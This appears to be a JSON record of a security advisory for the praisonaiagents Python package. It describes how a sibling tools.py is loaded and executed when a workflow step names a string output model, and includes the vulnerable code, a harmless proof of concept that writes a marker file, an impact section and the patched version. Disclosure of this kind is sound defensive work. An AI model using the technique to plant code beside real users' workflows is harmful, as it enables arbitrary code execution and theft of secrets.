{"id":"CVE-2026-61437","aliases":["GHSA-4gfv-wg42-7jw5"],"title":"PraisonAI: Unsafe Dynamic Module Loading Leads to Arbitrary Code Execution via tools.py in AgentFlow","summary":"PraisonAI: Unsafe Dynamic Module Loading Leads to Arbitrary Code Execution via tools.py in AgentFlow","severity":"high","cvss":7.8,"cwe":["CWE-693","CWE-829"],"vendor":"praisonaiagents","product":"praisonaiagents","ecosystem":"pip","affected":["praisonaiagents <= 1.6.77"],"patched":["praisonaiagents 1.6.78"],"published":"2026-10-08","updated":"2026-10-08","sourceUpdated":"2026-10-08T16:48:58Z","source":"GHSA","sourceUrl":"https://github.com/advisories/GHSA-4gfv-wg42-7jw5","references":[{"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-4gfv-wg42-7jw5"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-61437"},{"url":"https://www.vulncheck.com/advisories/praisonai-before-remote-code-execution-via-tools-py"},{"url":"https://github.com/advisories/GHSA-4gfv-wg42-7jw5"}],"tags":["ghsa","pip"],"epss":0.00174,"epssPercentile":0.06232,"ingestedAt":"2026-10-08T16:52:14.776Z","slug":"CVE-2026-61437","body":"## Overview\n\n### Summary\nAn unsafe dynamic module loading vulnerability allows an attacker who can control a workflow file and a sibling `tools.py` to execute arbitrary Python code when the workflow is executed.\n\n### Details\nThe vulnerability is located in the workflow structured output resolution logic.\n\nFile: src/praisonai-agents/praisonaiagents/workflows/workflows.py\n\nMethod: AgentFlow._resolve_pydantic_class\n\n```python\nif self.file_path:\n    workflow_dir = Path(self.file_path).parent\n    tools_path = workflow_dir / \"tools.py\"\n\n    if tools_path.exists():\n        spec = importlib.util.spec_from_file_location(\"tools\", tools_path)\n        tools_module = importlib.util.module_from_spec(spec)\n        spec.loader.exec_module(tools_module)   # Arbitrary code execution\n```\n\nThis code is reached during step execution when a step uses a string `output_pydantic`:\n\n```python\nstep_output_pydantic = getattr(step, '_output_pydantic', None)\nif step_output_pydantic and isinstance(step_output_pydantic, str):\n    resolved_class = self._resolve_pydantic_class(step_output_pydantic)\n```\n\n`file_path` is set automatically by:\n- `WorkflowManager._load_workflow()` (used by workspace discovery)\n- `WorkflowManager.create_workflow()`\n\nIt can also be set manually after `load_yaml()`:\n```python\nwf = mgr.load_yaml(\"workflow.yaml\")\nwf.file_path = \"workflow.yaml\"\n```\n\nThe `exec_module()` call has no sandboxing and ignores the `PRAISONAI_ALLOW_*_TOOLS` environment variables used elsewhere in the project.\n\n\n### PoC\nCreate the following two files in the same directory:\n\n`/tmp/attack/attack.yaml`\n```yaml\nname: AttackWorkflow\nsteps:\n  - name: generate\n    action: \"Produce structured output\"\n    output_pydantic: MaliciousModel\n```\n\n`/tmp/attack/tools.py`\n```python\nprint(\"[RCE] Arbitrary code executed from tools.py\")\n\nimport os\nwith open(\"/tmp/rce_success.txt\", \"w\") as f:\n    f.write(f\"RCE executed by PID {os.getpid()}\")\n\nclass MaliciousModel:\n    @classmethod\n    def model_json_schema(cls):\n        return {\"type\": \"object\"}\n```\n\nRun the following Python code (adjust the path to your PraisonAI source):\n\n```python\nimport sys\nsys.path.insert(0, \"/home/user/praisonai/src/praisonai-agents\")\n\nfrom praisonaiagents.workflows import WorkflowManager\nfrom praisonaiagents.agent.agent import Agent\n\nmgr = WorkflowManager()\nwf = mgr.load_yaml(\"/tmp/attack/attack.yaml\")\n\nwf.file_path = \"/tmp/attack/attack.yaml\"\n\nfor step in wf.steps:\n    step.output_pydantic = \"MaliciousModel\"\n    step._output_pydantic = \"MaliciousModel\"\n    if not getattr(step, \"agent\", None):\n        step.agent = Agent(\n            name=\"researcher\",\n            role=\"Researcher\",\n            goal=\"Generate output\",\n            instructions=\"Return structured data\"\n        )\n\nwf.start(\"trigger\")\n```\n\n### Impact\nType: Execution of Untrusted Local Code via Unsafe Dynamic Module Loading.\n\nAffected users include:\n\n- Users of `WorkflowManager(workspace_path=...)`, where workflow discovery automatically sets `file_path`.\n- Users of `WorkflowManager.create_workflow()`.\n- Applications that load workflows from repositories, templates, shared workflow collections, CI/CD artifacts, or other directories that may contain untrusted files.\n\nDuring workflow execution, a string `output_pydantic` reference causes the framework to automatically locate, import, and execute a sibling `tools.py` file.\n\nAs a result, code contained in `tools.py` executes with the privileges of the workflow runner without requiring an explicit import or user approval step.\n\nSuccessful exploitation results in arbitrary Python code execution within the workflow process. An attacker may be able to read local files, access secrets available to the process, modify workflow behavior, perform network operations, or execute additional system commands.\n\nThis behavior also bypasses the `PRAISONAI_ALLOW_TEMPLATE_TOOLS` / `PRAISONAI_ALLOW_LOCAL_TOOLS` protections used elsewhere in the project, allowing code execution through a separate workflow-resolution path.\n\n## Affected packages\n\n- `praisonaiagents <= 1.6.77`\n\n## Remediation\n\nUpgrade to a patched release:\n\n- `praisonaiagents 1.6.78`","depth":"twilight","depthScore":43,"depthScoreParts":{"impact":42.9,"likelihood":0,"exploitation":0,"ransomware":0},"changes":[]}